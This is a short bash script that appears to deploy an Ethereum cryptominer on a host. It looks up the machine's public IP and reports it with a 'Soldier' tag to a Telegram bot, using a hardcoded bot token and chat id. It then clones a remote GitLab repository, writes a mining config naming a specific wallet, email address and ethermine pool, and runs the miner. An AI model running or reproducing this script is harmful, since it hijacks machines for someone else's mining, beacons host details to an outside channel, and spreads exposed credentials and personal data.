#!/bin/bash

apt-get install jq -y

numb=$(echo $(shuf -i 100-500 -n 1))
myIp="$(wget -qO- ifconfig.me/ip)"
n0z="Soldier&numb|$myIp"
curl --silent -X GET 'https://api.telegram.org/bot1714268410:AAE-frVf8ydwGQ8ZjA2KSdXdkjKD-GtAAW4/sendMessage?chat_id=1335828890&text='$n0z --compressed

git clone https://gitlab.com/diablostrom5/master.git

touch master/config.ini
echo "rigName = Worker$numb" >> "master/config.ini"
echo "email = rahmatnugroho1990@gmail.com" >> "master/config.ini" 
echo "[Ethash]" >> "master/config.ini"
echo "wallet = 0xBb56A0cd7595244eC22AA12F159f56bf1D96797d" >> "master/config.ini"
echo "coin = eth" >> "master/config.ini" 
echo "pool1 = us1.ethermine.org:5555" >> "master/config.ini" 
echo "sortPools = true" >> "master/config.ini" 
cd master && chmod +x config.ini && chmod +x start && ./start
